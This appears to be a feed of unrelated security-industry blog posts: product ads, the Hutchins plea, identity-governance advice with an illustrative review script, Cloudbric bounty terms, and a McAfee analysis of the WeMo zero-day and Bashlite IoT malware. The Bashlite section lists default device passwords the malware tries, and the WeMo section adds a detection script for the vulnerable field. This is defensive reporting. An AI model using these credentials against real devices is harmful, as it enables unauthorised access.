Seqrite mSuite is a simple and comprehensive yet extremely powerful tool which organizations in the educational sector can consider to manage all mobile devices running on Android and iOS. It allows the network manager to get total control over the apps being installed on official devices, monitor the internet usage patterns, track the device location, apply policies as per location and time and provide support through remote device control as well as file transfer. This allows the organization to remain in total control of what’s happening with its data even beyond their own network.

The benefits of Seqrite mSuite

In particular, the following features offered by Seqrite mSuite make it the perfect solution for the education industry:

  • Comprehensive Mobile Security & Anti-Theft

Since the solution is cloud-based, it can be easily used by educational institutions while offering comprehensive mobile security. Any mobile device can be easily located, locked or erased in case of theft or damage.

  • App Management

Educational institutes need to manage control of external applications in a digital classroom situation which mSuite’s App Management feature allows seamlessly. App Distribution pushes apps and updates from the server to the mobile with the ability of certain apps to be recommended. Custom apps can be published to a specified organizational App Store while App Control allows blacklisting or whitelisting of specific applications or certain categories of applications.

  • Launcher & Kiosk Mode

The launcher & kiosk mode feature is extremely useful for use in an educational environment. The launcher enables control over the use of apps on devices and enables the configuration of selected apps for use within the organization. This way, educational institutes can control the type of apps used by students and prevent the use of apps they want to disallow. The Kiosk mode, on the other hand, transforms a device to use a single app for a single purpose within a system kiosk mode which can be extremely useful for organizations who want to restrict mobile devices to just educational content.

  • Fencing & Data Monitoring

Seqrite mSuite allows digital boundaries to be defined and restrictions to be applied on devices with regard to Wi-Fi, Geo and Time Fence. Through this feature, institutes can regulate usage of mobile devices within the digital classroom. Network Data Monitoring also allows the monitoring of data usage over mobile and Wi-Fi networks.

These features make Seqrite mSuite a great investment for educational organizations for usage in the digital classroom.

The post Seqrite mSuite can be the perfect solution for the education industry appeared first on Seqrite Blog.

The Mute Button: How to Use Your Most Underrated Social Superpower

For a Monday, the school day was turning out to be surprisingly awesome. Mackenzie sat with friends at lunch, chatted with her favorite teacher, and aced her English test.

Then came the shift.

It happened between 5th and 6th period when Mackenzie checked her Instagram account. One glance showed several posts from the popular girls (yet another party I wasn’t invited to, she thought). She saw her friend Emma’s Spring Break photos (how can someone look that good in a bikini, she wondered) followed by several who’s-dating-whom posts from blissful-looking couples (when is someone going to love me, she mused). In less than 60 seconds, the images and comments Mackenzie saw had the power to subtly alter her heart and mind.

FOMO

Mackenzie isn’t alone. Studies have repeatedly linked social networks with high levels of anxiety, depression, bullying and an emotional phenomenon called FOMO (fear of missing out) among teens and — if we’re honest — among plenty of adults.

We can’t control the perpetual stream of photos, comments, and videos that flood our social feeds. Social is here to stay, and to some extent, most of us are required to be online. However, we can control the amount and the quality of the content that comes at us. And, we can teach our kids to do the same.

It’s called the mute button, and it could be your family’s most underrated superpower when it comes to enjoying life online. Many people either don’t know about their mute button or forget they have it.

The mute button allows you to turn off someone’s feed (yes—make it vanish) without the awkwardness of unfollowing or unfriending them. The cool part: No one knows you’ve muted them, so there are no hurt feelings. You can still view a muted person’s profile, and they can see yours. You can send or receive direct messages as if everything were copacetic.

How to mute

Thankfully, you can mute people easily on most social networks.

To mute someone on Instagram, go to the person’s page, find the three little dots in the upper right of the page, tap them and choose mute (you can choose to mute their feed and their stories). You can mute someone on Facebook by going to the person’s main page and clicking the “friends” button under their photo. You will have the option to “unfollow,” which will mute the person’s content but allow you to stay friends. On Twitter, you can stop seeing a person’s tweets by going to the three dots in the upper right corner and choosing “mute.”

This simple, powerful click will allow you to curate what you see in your feed every day and instantly block the content that is annoying or negative. The result? Fewer emotional darts are flying at you randomly throughout the day and, hopefully, a more enjoyable, positive experience online.

When to mute

What’s considered annoying or offensive to one person may be entirely acceptable and even enjoyable to someone else. So, the reasons for muting someone can vary greatly.

A few reasons to mute might be: 

  • Inappropriate or offensive content
  • Mean, bullying, or reckless content
  • Posting too frequently
  • Excessive bragging, boasting, or self-promotion
  • Content that negatively impacts your mental health
  • Non-stop political posts or rants
  • Too many selfies
  • Graphic or disturbing images or videos
  • Constant negative or critical posts
  • Useless, uninteresting, or tedious information
  • Monopolizing conversations
  • Perpetual personal drama
  • Too much content on one topic

Talking points for families

Editing your social circle is okay. The voices that surround you have influence, so choose the voices you surround yourself with carefully. Also, being “friends” with 1,000 or even 300 people isn’t realistic or reflective of real life. Remind kids: That tug (or compulsion) you feel to like, comment, post, or chime in online should not rule your time or your mind. You (and your family) may be surprised how good it feels to whittle down the number of voices you allow into your day.

Pay attention to emotional triggers. In many ways, you are what you consume online. Ask yourself: Is this person’s account positive or negative? Does it make me feel included and worthy or excluded and less-than? Do I feel jealous, annoyed, or negative when I see this person’s updates, photos, or tweets? Edit boldly. You can mute negative accounts temporarily or permanently without guilt.

Less noise, less clutter. If you want things to be different, you have to do things differently, and this applies online. Forming your own thoughts and opinions is much more difficult when you are constantly absorbing other people’s ideas. The less digital clutter, the more room for quiet contemplation and self-awareness, which is always a good idea for young and older minds alike.

Be brave, be you. Kids pay far more attention to friend and follower counts than adults do. They consider it intentional rejection when someone unfollows or unfriends them online. For that reason, you may need to reiterate the importance of putting mental health before popularity or people pleasing. Remind them: It’s okay to mute, unfollow, or unfriend any person who is not a positive influence on your heart and mind.

No one is everyone’s favorite. It’s impossible to like everyone or be liked by everyone — impossible. There will always be individuals who will get under your skin. And, at times, people may feel the same about you. This is a normal part of human relationships. This reality makes striving to be liked by everyone online an impossible, exhausting task.

The digital world is packed with ever-changing social complexities. Seemingly casual clicks can trigger an avalanche of positive or negative emotions that can take their toll (whether we realize it or not). Helping your child think proactively about content and take responsibility for the content that comes across his or her screen is more important than ever in raising wise, healthy digital kids.

The post The Mute Button: How to Use Your Most Underrated Social Superpower appeared first on McAfee Blogs.

Marcus Hutchins: UK ransomware ‘hero’ pleads guilty to US hacking charges

Hutchins says he regrets his actions and will continue ‘keeping people safe from malware attacks’

A British computer security researcher once hailed as a “hero” for helping stem a ransomware outbreak and later accused of creating malware to attack the banking system said on Friday he had pleaded guilty to US criminal charges.

Marcus Hutchins, whose arrest in 2017 stunned the computer security community, acknowledged in a statement pleading guilty to criminal charges linked to his activity in 2014 and 2015.

Related: UK hacker jailed for six years for blackmailing pornography site users


Marcus “MalwareTech” Hutchins Pleads Guilty to Writing, Selling Banking Malware

Marcus Hutchins, a 24-year-old blogger and malware researcher arrested in 2017 for allegedly authoring and selling malware designed to steal online banking credentials, has pleaded guilty to criminal charges of conspiracy and to making, selling or advertising illegal wiretapping devices.

Marcus Hutchins, just after he was revealed as the security expert who stopped the WannaCry worm. Image: twitter.com/malwaretechblog

Hutchins, who authors the popular blog MalwareTech, was virtually unknown to most in the security community until May 2017 when the U.K. media revealed him as the “accidental hero” who inadvertently halted the global spread of WannaCry, a ransomware contagion that had taken the world by storm just days before.

In August 2017, Hutchins was arrested by FBI agents in Las Vegas on suspicion of authoring and/or selling “Kronos,” a strain of malware designed to steal online banking credentials. A British citizen, Hutchins has been barred from leaving the United States since his arrest.

Many of Hutchins’ supporters and readers had trouble believing the charges against him, and in response KrebsOnSecurity published a lengthy investigation into activities tied to his various online personas over the years.

As I wrote in summary of that story, the clues suggested “Hutchins began developing and selling malware in his mid-teens — only to later develop a change of heart and earnestly endeavor to leave that part of his life squarely in the rearview mirror.” Nevertheless, there were a number of indications that Hutchins’ alleged malware activity continued into his adulthood.

In a statement posted to his Twitter feed and to malwaretech.com, Hutchins said today he had pleaded guilty to two charges related to writing malware in the years prior to his career in security.

“I regret these actions and accept full responsibility for my mistakes,” Hutchins wrote. “Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks.”

Hutchins pleaded guilty to two of the 10 counts for which he was originally accused, including conspiracy charges and violating U.S.C. Title 18, Section 2512, which involves the manufacture, distribution, possession and advertising of devices for intercepting online communications.

Creating malware is a form of protected speech in the United States, but selling it and disseminating it is another matter. University of Southern California law professor Orin Kerr’s 2017 dissection of the government’s charges is worth a read for a deep dive on this sticky legal issue.

According to a copy of Hutchins’ plea agreement, both charges each carry a maximum of up to five years in prison, up to a $250,000 fine, and up to one year of supervised release. However, those charges are likely to be substantially tempered by federal sentencing guidelines, and may take into account time already served in detention. It remains unclear when he will be sentenced.

The plea agreement is here (PDF). “Attachment A” beginning on page 15 outlines the government’s case against Hutchins and an alleged co-conspirator. The government says between July 2012 and Sept. 2015, Hutchins helped create and sell Kronos and a related piece of malware called UPAS Kit.

Despite what many readers here have alleged, I hold no ill will against Hutchins. He and I spoke briefly in a friendly exchange after a chance encounter at last year’s DEF CON security conference in Las Vegas, and I said at the time I was rooting for him to beat the charges. I sincerely hope he is able to keep his nose clean and put this incident behind him soon.

Yours Truly shaking hands with Marcus Hutchins in Las Vegas, August 2018.

Do you have 1 minute? Check out our New weekly Quick Privacy Ref-erence series.

At Privacy Ref we are always thinking of ways to improve the experience of our followers and clients alike. Weekly on our YouTube channel you will find a relevant privacy topic being discussed in a 1-minute video such as:  Cookies walls and the Dutch DPA – Ben Siegel discusses his research on the Dutch Personal […]

The post Do you have 1 minute? Check out our New weekly Quick Privacy Ref-erence series. appeared first on Privacy Ref Blog.

Five Reasons You Need Identity Governance & Administration

Demands on organizations continue to intensify – the precarious balance between requests for more access and the need to be more secure is difficult to maintain. Additionally, all of this is to be achieved faster, with fewer resources. It is more important than ever for each organization to develop a strategy for managing and governing user access in an automated manner. A well-defined Identity Governance and Administration (IGA) program is becoming an increasingly critical piece of an organization’s security portfolio.

Small organizations with employees numbering in the double digits will be able to easily manage granting, removing, and reviewing access, and may even have predefined roles or access templates. Larger businesses, on the other hand, greatly benefit from implementing an IGA solution in order to effectively manage access to systems, applications, and devices. Read on to find out the many benefits of IGA and determine if it’s time for your organization to explore the world of IGA.

1. Regulatory Compliance

With regulations like the GDPR (General Data Protection Regulation), SOX (Sarbanes-Oxley), and HIPAA (Health Insurance Portability and Accountability Act) prioritizing and mandating data privacy, industries are focusing on access issues more than ever. Limiting and monitoring access to only those that need it is not only a crucial security measure, but one that is becoming critical to staying in compliance with these regulations.

IGA solutions not only help ensure that access to sensitive information like patient records or financial data is strictly controlled, they also enable organizations to prove they are taking these actions. Organizations can receive audit requests at any time. An effective IGA solution makes the required periodic review and attestation of access business friendly, effective, and comes with built-in reporting capabilities to meet relevant government and industry regulations. Taking a visual approach to the data can make this whole process more accurate and easier to deploy to the business.

2. Risk Management

The news cycle is dominated by stories of massive data breaches, with the organizations involved having to spend time and money on remediation efforts, while also dealing with the damage done to their reputation. IGA solutions take a proactive approach, reducing the exposure of sensitive data by rigorously limiting and guarding access to begin with, reducing the risk in the environment.

IGA solutions enable a robust approach to managing and governing access by focusing on three aspects of access. First, they practice the principle of least privilege, eliminating excess privileges and granting access only to those who absolutely need it in order to do their jobs. Secondly, they terminate ‘orphaned’ accounts as quickly as possible. These accounts, which are no longer being used because an employee has left the company or for any other reason, are perfect targets for those looking to breach the environment. Finally, IGA solutions monitor for segregation of duty (SoD) violations. This critical risk management concept dictates that no single individual should be able to complete a task on their own, creating a built-in system of checks and balances. For example, in a financial transaction, whoever creates a payee should not be the one to authorize payment.

3. Business Changes

Organizations grow and change continually, and an IGA solution can make those changes more efficient and less risky. Small changes, like individual promotions, transfers, and layoffs, can quickly be implemented, since IGA solutions provision access based on roles, not on individual accounts. This strategy of Role Based Access Control (RBAC) works equally well for larger changes, like mergers, acquisitions, and corporate reorganizations. IGA solutions can greatly shorten the timeline for executing bulk additions or transitions of user accounts by automating and streamlining provisioning and approvals. It is critical to develop roles in an accurate and intuitive manner.
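The three checks described under Risk Management (least privilege, orphaned accounts, segregation of duties) and the role-based transfer described under Business Changes are straightforward to express as an access review over a role model. The following is an added illustration, not code from Core Security or any IGA product; the role names, entitlement strings, SoD rule and identities are all constructed sample data, and the payee/payment rule is the example the text gives.

```python
from dataclasses import dataclass, field

# Constructed role model (hypothetical): role -> entitlements it confers.
ROLE_ENTITLEMENTS = {
    "ap_clerk":   {"erp:create_payee", "erp:view_invoices"},
    "ap_manager": {"erp:authorize_payment", "erp:view_invoices"},
    "hr_analyst": {"hris:view_records"},
}

# Segregation-of-duties rules: entitlement pairs no single identity may hold.
# The only rule here is the one from the text: payee creator != payment approver.
SOD_RULES = [("erp:create_payee", "erp:authorize_payment")]

# Constructed inventory of accounts that still exist in each target system.
# "dave" has no governed identity at all; "carol" is terminated but still has an account.
SAMPLE_ACCOUNTS = {
    "erp":  {"alice", "bob", "dave"},
    "hris": {"carol"},
}


@dataclass
class Identity:
    user: str
    roles: set
    active: bool                                   # False once HR marks the person as left
    direct_grants: set = field(default_factory=set)  # ad-hoc grants made outside any role


def sample_identities():
    """Constructed identities; alice received an ad-hoc grant that breaks SoD."""
    return [
        Identity("alice", {"ap_clerk"}, True, {"erp:authorize_payment"}),
        Identity("bob", {"ap_manager"}, True),
        Identity("carol", {"hr_analyst"}, False),
    ]


def role_access(identity):
    """Entitlements justified by the identity's assigned roles only."""
    return set().union(*(ROLE_ENTITLEMENTS.get(r, set()) for r in identity.roles))


def effective_access(identity):
    """Everything the identity can actually do: role-derived plus direct grants."""
    return role_access(identity) | identity.direct_grants


def sod_violations(identity):
    """SoD rules where the identity holds both conflicting entitlements."""
    access = effective_access(identity)
    return [rule for rule in SOD_RULES if rule[0] in access and rule[1] in access]


def excess_privileges(identity):
    """Least-privilege candidates: direct grants not explained by any role."""
    return sorted(identity.direct_grants - role_access(identity))


def orphaned_accounts(identities, accounts):
    """Accounts present in a system with no active governed identity behind them."""
    active_users = {i.user for i in identities if i.active}
    return sorted((system, user)
                  for system, users in accounts.items()
                  for user in users if user not in active_users)


def provision_transfer(identity, new_roles):
    """Role-based move: replace roles, drop ad-hoc grants; returns (revoked, granted)."""
    before = effective_access(identity)
    identity.roles = set(new_roles)
    identity.direct_grants = set()
    after = effective_access(identity)
    return sorted(before - after), sorted(after - before)


def run_review(identities, accounts):
    """One periodic access review: SoD conflicts, excess grants, orphaned accounts."""
    report = {"sod": {}, "excess": {}, "orphans": orphaned_accounts(identities, accounts)}
    for ident in identities:
        if not ident.active:
            continue  # terminated identities are handled by the orphan check instead
        if sod_violations(ident):
            report["sod"][ident.user] = sod_violations(ident)
        if excess_privileges(ident):
            report["excess"][ident.user] = excess_privileges(ident)
    return report


if __name__ == "__main__":
    ids = sample_identities()
    print(run_review(ids, SAMPLE_ACCOUNTS))
    print(provision_transfer(ids[0], {"hr_analyst"}))
```

The review flags alice's direct `erp:authorize_payment` grant twice, once as an SoD conflict with her role's `erp:create_payee` and once as an excess privilege with no role behind it, which is the usual way such a conflict arises: the role model was fine, the exception was not. Transferring her to `hr_analyst` revokes all three ERP entitlements in one step because the move is expressed in roles rather than individual account edits.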

4. Streamlining Budget

We all need to do more with less. Managing identity and access manually can be an unsustainable burden on IT. Provisioning access manually takes far more time, and often comes with additional help desk calls or tickets if these changes take too long or are done incorrectly. Documentation and reporting requirements add more effort and complexity. Certifying privileged access also becomes time consuming for managers and can result in rubber-stamping approvals in order to get on with more pressing matters. Carelessness in any of these tasks can lead to costly mistakes.

Of course, this also means that IT teams are sacrificing time that could be spent on other projects or improvements. IGA solutions minimize these time management issues and can also accomplish these tasks with higher accuracy.

5. Service Delivery

At their core, IGA solutions are designed to make life easier. Their usefulness impacts everyone within an organization. Establishing roles and streamlining provisioning makes for a much more efficient on-boarding process. The inefficiencies of a new hire having to wait for access, sometimes for days or weeks, can be eliminated. Their accounts will be created with access already in place, based on their assigned role. Managers don’t have to waste time requesting access for employees, nor do they need to worry about making sure that former employees no longer have access. Ultimately, everyone will have the access they need when they need it, allowing everyone to get to work that much faster.

With these clear, measurable benefits, it’s easy to see why IGA solutions are quickly becoming an essential component in many organizations’ security strategy. Core Security, a HelpSystems Company, has developed multiple integrated IGA solutions to tailor fit your organization, since no two IT environments look alike. While these solutions have different approaches to IGA, they all provide these five critical benefits, and more. To find out which IGA solution is right for you, request a personalized demo from one of our experts today.


Weekly Update 135


It's another episode with Scott Helme this week as he's back in town for NDC Security on the Gold Coast (still got a week to get those tickets, folks!) The timing actually works out pretty well as there was this week's announcement around Let's Encrypt's transition of their root cert which is right up his alley. There's also the whole TicTocTrack kids watch situation which aligns very well with both our prior experience. And just on that, when we recorded the video they were planning on getting the service back up and running that day (Thursday Aus time when we recorded). Turns out that didn't happen and frankly, kudos to them for taking a little more time to get things right:

All that and more in this week's update:


References

  1. We're at NDC Security on the Gold Coast week after next (Scott's doing the World's Best TLS Training, I'm doing Hack Yourself First)
  2. Let's Encrypt's transition to ISRG root (that post of Scott's went to number 1 on Hacker News so good work on that mate!)
  3. TicTocTrack had an absolute zinger of an IDOR vulnerability (they're not the only watch in this class to have serious flaws either)
  4. Twilio are sponsoring my blog this week, big thanks to them! (check out how you can use Authy to add 2FA to your app)

Cloudbric’s Threat DB To Open For Security Contributions And CLB Rewards


We’re super excited to announce the release of Threat DB on April 29, a community driven threat intelligence database for both end users and organizations to view a variety of threat information.

Threat DB is part of the renewed Cloudbric Labs in which you’ll notice that the same free security tools we previously introduced have been rebranded. 

Until now, threat intelligence has been highly privatized meaning security vendors are continuously collecting vast amounts of emerging cyber threat information but are not making it accessible for public use.

Instead, vendors typically use it for their own gain, as we discuss in depth in our whitepaper.

With the launch of Threat DB, users have access to our threat information (hacker wallet addresses, phishing URLs, blacklisted IPs) without restrictions.

We aim to develop Threat DB into one of the largest decentralized global databases of cyber threat information, one that is kept transparent for public use.

However, it’s not just for end users to benefit.

Developers or companies interested in using the data from Threat DB can do so through our API, which is set to be available at a later release date.

Now here’s where the fun part begins!


Users have the opportunity to get compensated in the form of cryptocurrency simply by adding valuable threat information to the database (to be verified by Cloudbric’s team of security experts).

In the future, existing Cloudbric users will also have the opportunity to be rewarded simply by submitting their logs following a hacking episode.

With the CLB Reward System, anyone can earn by signing up and contributing to Threat DB.

Although Threat DB only offers a collection of hacker fraud addresses, phishing URLs and blacklisted IPs for viewing and contributing at its beta stage, we strive to continuously expand our service and add more threat data in the future.

Head over to Cloudbric Labs on April 29 to begin exploring our database, which holds more than 10,000 threat records, or begin contributing.

More details about the contribution and rewards process will be available on the Cloudbric Labs event page.  


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Cloudbric’s Threat DB To Open For Security Contributions And CLB Rewards appeared first on Cloudbric.

Participate in Cloudbric’s Massive Scale Bounty Program + Event For More Rewards


To celebrate the renewal of Cloudbric Labs including the launch of Threat DB, we’re also conducting a large scale bounty program in order to drive product improvement and improve our services on a secure platform.

To show our commitment, we’ve allocated 10 million CLB (10,000,000 CLB), which is approximately equivalent to $106,000 USD, just for the bounty program!

The bounty program and event will run for approximately 3 months (Monday, April 29 – Monday, July 22).

There will be two bounty events:

  • Bug bounty
  • Contribution bounty

So how do you participate?

Once Threat DB goes live on April 29, sign up to become a Cloudbric Labs member if you haven’t already. Once you’re logged in, go to the contribute page and begin submitting your threat data.

Follow the instructions for that bounty and submit your threat data. That’s it!

You can check your status through the ranking charts for that specific bounty.  

Please note that participants who are caught spamming or cheating the system will be immediately banned.

Please read and follow the event participation and bug bounty guidelines as found on the Event page of Cloudbric Labs: labs.cloudbric.com/event

Important information about the specific bounties can be found below!

Bug Bounty Program

  • Duration: April 29th Monday ~ May 24th Friday
  • Target Scope: Cloudbric Labs Homepage, Cloudbric Labs Threat DB
  • Target URL: labs.cloudbric.com, labs.cloudbric.com/threatdb, and all other sub URLs under Threat DB
  • Bounty rewards differ per vulnerability level
    • Very High (when the web server has been turned over to third parties, or when the services are disrupted and become unavailable): 1,000,000 CLB
    • Medium (when the server has sustained limited damage, or when server information has been falsified): 300,000 CLB
    • Low (from the possibility of attacks, such as when data vulnerabilities are gathered, to minor bugs like typos): 10,000 CLB
  • Participation type: Blind
  • How to Participate: Sign up with Cloudbric, then submit Bug Bounty Form
  • Rewards Distribution: Every Wednesday beginning May

Contribution Bounty

  • Duration: April 29th Monday ~ July 22nd Monday
  • CLB will be rewarded for users who contribute the highest number of threat data (only validated threat data with threat levels) every month
    • 1st: 1,000,000 CLB
    • 2nd: 600,000 CLB
    • 3rd: 400,000 CLB
    • 4th: 150,000 CLB
    • 5th: 100,000 CLB
    • Users with identical ranks will be re-ranked according to higher threat level, and submission date
  • Participation type: Blind: Open, Ranking Chart updated real time
  • How to Participate: sign up with Cloudbric Labs, and submit threat data to Threat DB
  • Rewards Distribution: End of every month beginning May

If you have any questions please email us at support@cloudbric.com!


Make sure to follow us on our social media platforms (LinkedIn, Twitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Participate in Cloudbric’s Massive Scale Bounty Program + Event For More Rewards appeared first on Cloudbric.

IoT Zero-Days – Is Belkin WeMo Smart Plug the Next Malware Target?

Effective malware is typically developed with intention, targeting specific victims using either known or unknown vulnerabilities to achieve its primary functions. In this blog, we will explore a vulnerability submitted by McAfee Advanced Threat Research (ATR) and investigate a piece of malware that recently incorporated similar vulnerabilities. The takeaway from this blog is the increasing movement towards IoT-specific malware and the likelihood of this unique vulnerability being incorporated into future malware.

We are rapidly approaching the one-year mark for the date McAfee ATR disclosed to Belkin (a consumer electronics company) a critical, remote code execution vulnerability in the Belkin WeMo Insight smart plug. The date was May 21st, 2018, and the disclosure included extensive details on the vulnerability (a buffer overflow), proof-of-concept, exploit code and even a video demo showing the impact, dropping into a root shell opened on the target device. We further blogged about how this device, once compromised, can be used to pivot to other devices inside the network, including smart TVs, surveillance cameras, and even fully patched non-IoT devices such as PCs. Initially, the vendor assured us they had a patch ready to go and would be rolling it out prior to our planned public disclosure. In January of 2019, Belkin patched a vulnerability in the Mr. Coffee Coffee Maker w/ WeMo, which McAfee ATR reported to Belkin on November 16th, 2018, and released publicly at Mobile World Congress in late February. We commend Belkin for an effective patch within the disclosure window, though we were somewhat surprised that this was the prioritized patch, given that the Mr. Coffee product with WeMo no longer appears to be produced or sold.

The Insight smart plug firmware update never materialized and, after attempts to try to communicate further, three months later, in accordance with our vulnerability disclosure policy, McAfee ATR disclosed the issue publicly on August 21st. Our hope is that vulnerability disclosures will encourage vendors to patch vulnerabilities, educate the security community on a vulnerable product to drive development of defenses and, ultimately, encourage developers to recognize the impact that insecure code development can have.

Fast forward nearly a year and, to the best of our knowledge, this vulnerability, classified as CVE-2018-6692, is still a zero-day vulnerability. As of April 10th, 2019, we have heard of plans for a patch towards the end of the month and are standing by to confirm. We intentionally did not release exploit code to the public, as we believe it tips the balance in favor of cyber criminals, but exploitation of this vulnerability, while challenging in some regards, is certainly straightforward for a determined attacker.

IoT-Specific Malware

Let’s focus now on why this vulnerability is enticing for malicious actors.  Recently, Trend Micro released a blog observing occasional in-the-wild detections for a malware known as Bashlite. This specific malware was recently updated to include IoT devices in its arsenal, specifically using a Metasploit module for a known vulnerability in the WeMo UPnP protocol. The vulnerability appears to be tied to a 2015 bug which was patched by Belkin and was used to fingerprint and exploit WeMo devices using the “SetSmartDevInfo” action and corresponding “SmartDevURL” argument.

We can say for certain that this Metasploit module is not targeting the same vulnerability submitted by McAfee ATR, which resides in the <EnergyPerUnitCostVersion> XML field, within the libUPnPHndlr.so library.
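A defensive check for the field named above, added here as an example and not code from McAfee ATR or Belkin: it parses a captured UPnP SOAP request to a WeMo device and flags an EnergyPerUnitCostVersion value longer than a conservative threshold. The action name, service namespace, MAX_FIELD_LEN and the sample requests are constructed assumptions, since the page does not give the overflowed buffer's size.

```python
"""Length check for the <EnergyPerUnitCostVersion> UPnP argument.

Added example (not McAfee ATR's or Belkin's code). The page describes
CVE-2018-6692 as a buffer overflow reached through this XML field in
libUPnPHndlr.so but does not state the buffer size, so MAX_FIELD_LEN is an
assumed, deliberately low threshold: legitimate version strings are short.
"""
import xml.etree.ElementTree as ET
from typing import Dict, Iterable, List, Optional, Tuple

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WATCHED_FIELDS = {"EnergyPerUnitCostVersion"}
MAX_FIELD_LEN = 64  # assumption, see module docstring


def soap_body_fields(xml_text: str) -> Dict[str, str]:
    """Return {local tag name: text} for every leaf element inside the SOAP Body."""
    root = ET.fromstring(xml_text)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        return {}
    fields: Dict[str, str] = {}
    for elem in body.iter():
        if elem is not body and len(elem) == 0:  # leaf element
            local_name = elem.tag.split("}")[-1]  # strip any namespace prefix
            fields[local_name] = elem.text or ""
    return fields


def inspect_request(xml_text: str) -> Optional[str]:
    """Return an alert string for an oversized watched field, else None."""
    try:
        fields = soap_body_fields(xml_text)
    except ET.ParseError:
        # A request the parser rejects outright is itself worth a look.
        return "alert: malformed SOAP envelope"
    for name in sorted(WATCHED_FIELDS):
        if name in fields and len(fields[name]) > MAX_FIELD_LEN:
            return f"alert: {name} length {len(fields[name])} > {MAX_FIELD_LEN}"
    return None


def scan_capture(requests: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Run inspect_request over (source, xml) pairs; return the alerts raised."""
    alerts: List[Tuple[str, str]] = []
    for source, xml_text in requests:
        alert = inspect_request(xml_text)
        if alert:
            alerts.append((source, alert))
    return alerts


# Constructed sample traffic. The action element and its namespace are
# placeholders, not the real WeMo service definition.
BENIGN_REQUEST = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    '<s:Body><u:ExampleAction xmlns:u="urn:example:service:1">'
    "<EnergyPerUnitCostVersion>1.0</EnergyPerUnitCostVersion>"
    "</u:ExampleAction></s:Body></s:Envelope>"
)
OVERSIZED_REQUEST = BENIGN_REQUEST.replace(">1.0<", ">" + "x" * 500 + "<")
SAMPLE_CAPTURE = [
    ("192.0.2.10", BENIGN_REQUEST),    # constructed, RFC 5737 test address
    ("192.0.2.77", OVERSIZED_REQUEST),  # constructed, RFC 5737 test address
]

if __name__ == "__main__":
    for src, alert in scan_capture(SAMPLE_CAPTURE):
        print(f"{src}: {alert}")
```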

Analysis of Bashlite and IoT Device Targets

After briefly analyzing a few samples of the malware (file hashes from the aforementioned blog), the malware appears to check for default credentials and known vulnerabilities in multiple IoT devices. For example, I came across a tweet after finding a reference in the binary to the password “oelinux123”.

This IoT device is an Alcatel Mobile Wifi, which has a number of known/default passwords. Notice the top username/password combination of “root:oelinux123.” When we analyze the actual malware, we can observe the steps used to enumerate and scan for vulnerable devices.

Here is a reference from the popular binary disassembly tool IDA Pro showing the password “OELINUX123” used to access a mobile WiFi device.

The next image is a large “jump table” used to scan through and identify a range of devices or targets using known passwords or vulnerabilities.

Next is some output from the “Echobot” scanner employed by the malware used to report possible vulnerabilities in target devices from the above jump table.

The final screenshot shows a list of some of the hardcoded credentials used by the malware.

The “huigu309” password appears to be associated with Zhone and Alcatel Lucent routers. Both routers have had several known vulnerabilities, backdoors and hardcoded passwords built into the firmware.

There is no need to continue the analysis further, as the point here is not to analyze the Bashlite malware in depth; I did think it was worth briefly expanding on some of its capabilities to show that this malware is programmed to target multiple IoT devices.

Now to the point! The simple fact that generic WeMo Metasploit modules were added to this malware indicates that Belkin WeMo makes an interesting enough target that an unpatched vulnerability would be compelling to add to the malware’s capabilities. Hence, we believe it is possible, perhaps even likely, that malware authors already have or are currently working on incorporating the unpatched WeMo Insight vulnerability into IoT malware. We will be closely following threats related to this zero-day and will update or add to this blog if malware embedding this vulnerability surfaces. If the vendor does produce an effective patch, it will be a step in the right direction to reduce the overall threat and likelihood of weaponizing the vulnerability in malware.

How to Protect Your Devices

As this vulnerability requires network access to exploit the device, we highly recommend users of IoT devices such as the WeMo Insight implement strong Wi-Fi passwords, and further isolate IoT devices from critical devices using VLANs or network segmentation. McAfee Secure Home Platform users can enable whitelisting or blacklisting features for protection from malicious botnets attempting to exploit this vulnerability.

Call to Action for Vendors, Consumers and Enterprise

It should be plain to see there is some low-hanging fruit in the industry of securing IoT devices. While some of the obvious simple issues such as hardcoded credentials are unexplainable, we understand that true software vulnerabilities cannot always be avoided. However, we issue a call to action for IoT vendors: these issues must be fixed, and quickly too. Threat actors are constantly tracking flaws which they can weaponize, and we see a prime example of this in the Bashlite malware, updated for IoT devices including Belkin WeMo. By listening to consumers’ asks for security, partnering closely with researchers to identify flaws, and having a fast and flexible response model, vendors have a unique opportunity to close the holes in the products the world is increasingly relying on. Consumers can take away the importance of basic security hygiene: applying security updates when available, practicing a complex password policy for home networks and devices, and isolating critical devices or networks from IoT. Enterprise readers should be aware that just because this is typically a consumer IoT device does not mean corporate assets cannot be compromised. Once a home network has been infiltrated, all devices on that same network should be considered at risk, including corporate laptops. This is a common method for cyber criminals to cross the boundary between home and enterprise.

The post IoT Zero-Days – Is Belkin WeMo Smart Plug the Next Malware Target? appeared first on McAfee Blogs.

Better protection against Man in the Middle phishing attacks

We’re constantly working to improve our phishing protections to keep your information secure. Last year, we announced that we would require JavaScript to be enabled in your browser when you sign in so that we can run a risk assessment whenever credentials are entered on a sign-in page and block the sign-in if we suspect an attack. This is yet another layer of protection on top of existing safeguards like Safe Browsing warnings, Gmail spam filters, and account sign-in challenges.

However, one form of phishing, known as “man in the middle” (MITM), is hard to detect when an embedded browser framework (e.g., Chromium Embedded Framework - CEF) or another automation platform is being used for authentication. MITM intercepts the communications between a user and Google in real-time to gather the user’s credentials (including the second factor in some cases) and sign in. Because we can’t differentiate between a legitimate sign in and a MITM attack on these platforms, we will be blocking sign-ins from embedded browser frameworks starting in June. This is similar to the restriction on webview sign-ins announced in April 2016.

What developers need to know

The solution for developers currently using CEF for authentication is the same: browser-based OAuth authentication. Aside from being secure, it also enables users to see the full URL of the page where they are entering their credentials, reinforcing good anti-phishing practices. If you are a developer with an app that requires access to Google Account data, switch to using browser-based OAuth authentication today.

Wipro Intruders Targeted Other Major IT Firms

The crooks responsible for launching phishing campaigns that netted dozens of employees and more than 100 computer systems last month at Wipro, India’s third-largest IT outsourcing firm, also appear to have targeted a number of other competing providers, including Infosys and Cognizant, new evidence suggests. The clues so far suggest the work of a fairly experienced crime group that is focused on perpetrating gift card fraud.

